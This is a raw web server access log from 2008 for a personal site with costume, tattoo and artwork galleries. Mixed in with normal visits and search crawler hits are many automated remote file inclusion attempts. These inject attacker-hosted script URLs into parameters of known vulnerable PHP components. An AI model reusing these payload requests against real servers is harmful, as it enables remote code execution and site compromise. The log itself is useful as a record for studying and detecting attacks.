208.111.154.16 - - [29/May/2008:17:23:04 -0500] "GET /memorial/ HTTP/1.0" 200 817 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [29/May/2008:17:25:34 -0500] "GET /costume HTTP/1.0" 301 319 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [29/May/2008:17:25:35 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.15 - - [29/May/2008:17:27:47 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.15 - - [29/May/2008:17:27:47 -0500] "GET /artwork/artmaster.htm HTTP/1.0" 200 886 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
163.180.114.71 - - [29/May/2008:17:30:52 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/Mic22.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
163.180.114.71 - - [29/May/2008:17:30:53 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/Mic22.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
163.180.114.71 - - [29/May/2008:17:30:53 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/Mic22.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
211.202.2.230 - - [29/May/2008:17:36:34 -0500] "GET /logs/access_log.1207785600//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://xdedzx.com/xdedzx/id.txt??? HTTP/1.1" 404 372 "-""libwww-perl/5.79"
211.202.2.230 - - [29/May/2008:17:36:35 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://xdedzx.com/xdedzx/id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
211.202.2.230 - - [29/May/2008:17:36:35 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://xdedzx.com/xdedzx/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
65.55.208.134 - - [29/May/2008:17:41:19 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [29/May/2008:17:41:19 -0500] "GET /artwork/carousel.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
209.221.240.193 - - [29/May/2008:17:41:54 -0500] "GET /costume/ HTTP/1.0" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:05 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:05 -0500] "GET /costume/enter1.gif HTTP/1.0" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:05 -0500] "GET /costume/costm_a.JPG HTTP/1.0" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:05 -0500] "GET /costume/history5.gif HTTP/1.0" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:15 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:18 -0500] "GET /costume/thmb1.htm HTTP/1.0" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:18 -0500] "GET /costume/costm2.jpg HTTP/1.0" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:18 -0500] "GET /costume/costm1.jpg HTTP/1.0" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:19 -0500] "GET /costume/costm4.jpg HTTP/1.0" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:19 -0500] "GET /costume/costm5.jpg HTTP/1.0" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:19 -0500] "GET /costume/costm6.jpg HTTP/1.0" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:19 -0500] "GET /costume/costm7.jpg HTTP/1.0" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:21 -0500] "GET /costume/costm8.jpg HTTP/1.0" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:21 -0500] "GET /costume/costm9.jpg HTTP/1.0" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:21 -0500] "GET /costume/costm3.jpg HTTP/1.0" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:22 -0500] "GET /costume/costm11.jpg HTTP/1.0" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:22 -0500] "GET /costume/costm10.jpg HTTP/1.0" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:22 -0500] "GET /costume/costm12.jpg HTTP/1.0" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:33 -0500] "GET /costume/thmb2.htm HTTP/1.0" 200 3346 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:33 -0500] "GET /costume/costm13.jpg HTTP/1.0" 200 10011 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:33 -0500] "GET /costume/costm14.jpg HTTP/1.0" 200 10586 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:33 -0500] "GET /costume/costm15.jpg HTTP/1.0" 200 9724 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:34 -0500] "GET /costume/costm16.jpg HTTP/1.0" 200 9075 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:34 -0500] "GET /costume/costm17.jpg HTTP/1.0" 200 9825 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:34 -0500] "GET /costume/costm18.jpg HTTP/1.0" 200 9364 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:34 -0500] "GET /costume/costm19.jpg HTTP/1.0" 200 10555 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:34 -0500] "GET /costume/costm21.jpg HTTP/1.0" 200 9439 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:34 -0500] "GET /costume/costm20.jpg HTTP/1.0" 200 57110 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:35 -0500] "GET /costume/costm22.jpg HTTP/1.0" 200 9434 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:35 -0500] "GET /costume/costm23.jpg HTTP/1.0" 200 9858 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:35 -0500] "GET /costume/costm24.jpg HTTP/1.0" 200 9990 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:40 -0500] "GET /costume/index1.htm HTTP/1.0" 200 21563 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:52 -0500] "GET /costume/thmb3.htm HTTP/1.0" 200 2922 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:53 -0500] "GET /costume/costm25.jpg HTTP/1.0" 200 9810 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:53 -0500] "GET /costume/costm26.jpg HTTP/1.0" 200 9402 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:53 -0500] "GET /costume/costm27.jpg HTTP/1.0" 200 9516 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:53 -0500] "GET /costume/costm28.jpg HTTP/1.0" 200 10658 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:53 -0500] "GET /costume/costm29.jpg HTTP/1.0" 200 9835 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:54 -0500] "GET /costume/costm30.jpg HTTP/1.0" 200 59433 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:54 -0500] "GET /costume/costm31.jpg HTTP/1.0" 200 9395 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:54 -0500] "GET /costume/costm32.jpg HTTP/1.0" 200 9839 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:54 -0500] "GET /costume/costm33.jpg HTTP/1.0" 200 9703 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:54 -0500] "GET /costume/costm34.jpg HTTP/1.0" 200 9637 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:54 -0500] "GET /costume/costm35.jpg HTTP/1.0" 200 10912 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
209.221.240.193 - - [29/May/2008:17:42:54 -0500] "GET /costume/costm36.jpg HTTP/1.0" 200 9631 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
84.19.188.13 - - [29/May/2008:17:44:41 -0500] "GET /logs/access_log.1207180800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kecebong.justfree.com/iyes.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.803"
84.19.188.13 - - [29/May/2008:17:44:41 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kecebong.justfree.com/iyes.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
84.19.188.13 - - [29/May/2008:17:44:41 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kecebong.justfree.com/iyes.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
86.139.1.158 - - [29/May/2008:17:45:21 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MSIECrawler)"
65.55.208.124 - - [29/May/2008:17:47:27 -0500] "GET /logs/access_log.1195516800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
219.94.129.31 - - [29/May/2008:17:51:06 -0500] "GET /logs/access_log.1207785600//oneadmin/newspublish/include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
219.94.129.31 - - [29/May/2008:17:51:07 -0500] "GET //oneadmin/newspublish/include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
219.94.129.31 - - [29/May/2008:17:51:07 -0500] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
219.94.129.31 - - [29/May/2008:17:51:40 -0500] "GET /logs/access_log.1181952000//oneadmin/newspublish/include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
208.111.154.16 - - [29/May/2008:17:52:22 -0500] "GET /artwork/artmaster.htm HTTP/1.0" 200 886 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
208.111.154.16 - - [29/May/2008:17:52:22 -0500] "GET /artwork/artmaster-side2d.png HTTP/1.0" 200 56776 "http://tomdolan.pconline.com/artwork/artmaster.htm""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
208.111.154.16 - - [29/May/2008:17:52:22 -0500] "GET /artwork/artmaster-front1b.png HTTP/1.0" 200 57135 "http://tomdolan.pconline.com/artwork/artmaster.htm""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
208.111.154.16 - - [29/May/2008:17:52:23 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
208.111.154.15 - - [29/May/2008:17:52:24 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.15 - - [29/May/2008:17:52:24 -0500] "GET /artwork/carousel.htm HTTP/1.0" 200 814 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
74.55.53.226 - - [29/May/2008:17:53:15 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.walmax.eu/upload/.help/coi.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
74.55.53.226 - - [29/May/2008:17:53:16 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.walmax.eu/upload/.help/coi.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
74.55.53.226 - - [29/May/2008:17:53:16 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.walmax.eu/upload/.help/test.txt??? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
74.55.53.226 - - [29/May/2008:17:53:16 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.walmax.eu/upload/.help/test.txt??? HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
204.92.87.157 - - [29/May/2008:17:59:50 -0500] "GET /logs///?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 200 85406 "-""libwww-perl/5.811"
204.92.87.157 - - [29/May/2008:17:59:50 -0500] "GET ///?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 200 1244 "-""libwww-perl/5.811"
208.131.142.223 - - [29/May/2008:18:04:35 -0500] "GET /logs///?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 200 85406 "-""libwww-perl/5.805"
208.131.142.223 - - [29/May/2008:18:04:35 -0500] "GET ///?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 200 1244 "-""libwww-perl/5.805"
208.80.193.32 - - [29/May/2008:18:08:38 -0500] "GET / HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; iebar; acc=jocker; acc=none; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
68.76.31.154 - - [29/May/2008:18:10:05 -0500] "GET /logs///?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 200 85406 "-""libwww-perl/5.79"
68.76.31.154 - - [29/May/2008:18:10:05 -0500] "GET ///?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 200 1244 "-""libwww-perl/5.79"
80.154.38.121 - - [29/May/2008:18:12:10 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
74.6.17.186 - - [29/May/2008:18:12:34 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.186 - - [29/May/2008:18:12:35 -0500] "GET /logs/access_log.1181692800 HTTP/1.0" 200 157867 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.232.156.135 - - [29/May/2008:18:15:17 -0500] "GET /logs///?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 200 85406 "-""libwww-perl/5.810"
66.232.156.135 - - [29/May/2008:18:15:17 -0500] "GET ///?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 200 1244 "-""libwww-perl/5.810"
82.165.253.72 - - [29/May/2008:18:17:22 -0500] "GET /logs/access_log.1207180800//content/multithumb/multithumb.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
82.165.253.72 - - [29/May/2008:18:17:22 -0500] "GET //content/multithumb/multithumb.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
82.165.253.72 - - [29/May/2008:18:17:22 -0500] "GET /logs//content/multithumb/multithumb.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
193.252.149.15 - - [29/May/2008:18:21:36 -0500] "GET http://tomdolan.pconline.com:80/robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.15 - - [29/May/2008:18:21:38 -0500] "GET / HTTP/1.1" 200 1243 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
203.22.204.188 - - [29/May/2008:18:21:41 -0500] "GET /logs//book.php5?page=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
203.22.204.188 - - [29/May/2008:18:21:41 -0500] "GET //book.php5?page=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
208.131.142.223 - - [29/May/2008:18:22:08 -0500] "GET /logs//Full_Release/include/body_comm.inc.php?content=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
208.131.142.223 - - [29/May/2008:18:22:08 -0500] "GET //Full_Release/include/body_comm.inc.php?content=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
204.92.87.157 - - [29/May/2008:18:22:32 -0500] "GET /logs//Full_Release/include/body_comm.inc.php?content=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
204.92.87.157 - - [29/May/2008:18:22:32 -0500] "GET //Full_Release/include/body_comm.inc.php?content=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
68.76.31.154 - - [29/May/2008:18:25:11 -0500] "GET /logs//Full_Release/include/body_comm.inc.php?content=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
68.76.31.154 - - [29/May/2008:18:25:11 -0500] "GET //Full_Release/include/body_comm.inc.php?content=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
82.146.59.231 - - [29/May/2008:18:29:21 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
82.146.59.231 - - [29/May/2008:18:29:21 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
65.55.208.123 - - [29/May/2008:18:30:46 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [29/May/2008:18:30:46 -0500] "GET /?S=A HTTP/1.1" 200 1243 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.232.156.135 - - [29/May/2008:18:38:25 -0500] "GET /logs//Full_Release/include/body_comm.inc.php?content=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
66.232.156.135 - - [29/May/2008:18:38:25 -0500] "GET //Full_Release/include/body_comm.inc.php?content=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
66.230.196.115 - - [29/May/2008:18:39:19 -0500] "GET /logs/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.haiagaros.info/hugs.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
66.230.196.115 - - [29/May/2008:18:39:19 -0500] "GET /program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.haiagaros.info/hugs.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
212.227.103.131 - - [29/May/2008:18:42:30 -0500] "GET /logs//Full_Release/include/body_comm.inc.php?content=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
212.227.103.131 - - [29/May/2008:18:42:35 -0500] "GET //Full_Release/include/body_comm.inc.php?content=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
70.244.206.200 - - [29/May/2008:18:43:52 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?source=ig&hl=en&rlz=1G1GGLQ_ENUS267&q=vintage+tattoo+flash&btnG=Google+Search""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
70.244.206.200 - - [29/May/2008:18:43:52 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
70.244.206.200 - - [29/May/2008:18:43:52 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
70.244.206.200 - - [29/May/2008:18:43:53 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
70.244.206.200 - - [29/May/2008:18:44:04 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
